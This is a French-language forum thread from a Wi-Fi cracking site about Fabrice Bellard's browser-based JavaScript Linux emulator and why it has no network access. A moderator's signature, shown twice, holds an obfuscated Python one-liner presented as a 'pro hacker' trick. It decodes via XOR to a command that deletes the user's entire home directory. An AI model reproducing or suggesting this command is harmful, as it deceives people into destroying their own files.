Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-05-2012 14:02:41

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Emuler un PC avec linux depuis son navigateur web (Javascript)

C'est "pour s'amuser" que Fabrice Bellard s'est mis en tête de mener son petit projet.

Rien d'impossible pour le créateur de Qemu, très puissant tool d'émulation, et le détenteur du record du monde de longueur du nombre π.

PIrecord.png

Sources

Si il arrive à avoir les résultats d'un super ordinateur avec son PC, se serait pas mal qu'il se penche sur le crack WPA lol
Il a donc crée un émulateur en java compatible aussi bien avec Firefox 4 qu'avec Chrome 11 et qui émule linux (kernel 2.6.20.)
linuxstart-20120111.tar.gz.

[*]32 bit x86 compatible CPU
8259 Programmble Interrupt Controller
8254 Programmble Interrupt Timer
16450 UART
Real Time Clock.
IDE interface and hard disk.[/*]

Son joujou a déjà été testé avec succès par l'un des membre fondateur du célèbre navigateur firefox et de javascript, Brendan Eich
L'un des buts affichés de l'auteur et d'émuler en utilisant le moins de ressources possibles les vieux jeux pour windows...
Pour s'amuser, quoi! smile

Site de de Fabrice Bellard
bellard.org

Sources
Linux Kernel Running in PC Emulator Written in JavaScript

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-10-2014 22:32:52

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Re : Emuler un PC avec linux depuis son navigateur web (Javascript)

Y a pas de network, j'ai activé une eth0 avec une IP, etc. mais dés que j'essaie de ping Google, il me dit  va taper son url un peu plus haut ça ira plus vite hmm

http://www.bellard.org/jslinux/

Dernière modification par Fuji (15-10-2014 04:54:40)

#3 15-10-2014 10:34:13

spawn
Modérateur

Bah oui, comment tu veux qu'il les route tes paquets ? big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 15-10-2014 22:54:26

Fuji
Membre Irremplaçable

Je pensais que c'est une sorte de VM.

Dernière modification par Fuji (15-10-2014 22:54:48)

#5 16-10-2014 09:18:46

spawn
Modérateur

C'en est une. Mais elle ne peut être branchée sur rien, vu que c'est du javascript qui s'exécute dans la sandbox js de ton navigateur. Heureusement que n'importe quel bout de js ne peut pas créer des paquets réseau big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#6 17-10-2014 01:38:31

Fuji
Membre Irremplaçable

En fait, je découvre ça qu'hier et franchement je ne sais pas comment il fonctionne, je ne savais pas qu'il y avait uniquement du JS dedans, j'avais pensé à un truc comme une appelet JAVA avec laquelle on peut exécuter des binaires dans une VM Java.

Heureusement que n'importe quel bout de js ne peut pas créer des paquets réseau big_smile

Je n'sais pas si je saisis bien ce que tu veux dire, mais par exemple l'objet "XMLhttpRequest" peut faire du TCP et ainsi une page peut communiquer en douce avec le serveur en temps réel sans actualiser cette dernière, autre exemple aussi, on peut utiliser des sockets TCP et UDP avec Java et Flash 9.

Mais je trouve cela vraiment prodigieux d'avoir émulé Linux uniquement avec du JS, même si c'est un langage à part entière il reste quand même spécifique au navigateur... ce n'est pas du Python. Mais comme le dit Kcdtv, rien n'est impossible pour le créateur de Qemu et le détenteur du record du monde de longueur du nombre PI, vraiment bravo à Fabrice Bellard wink

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]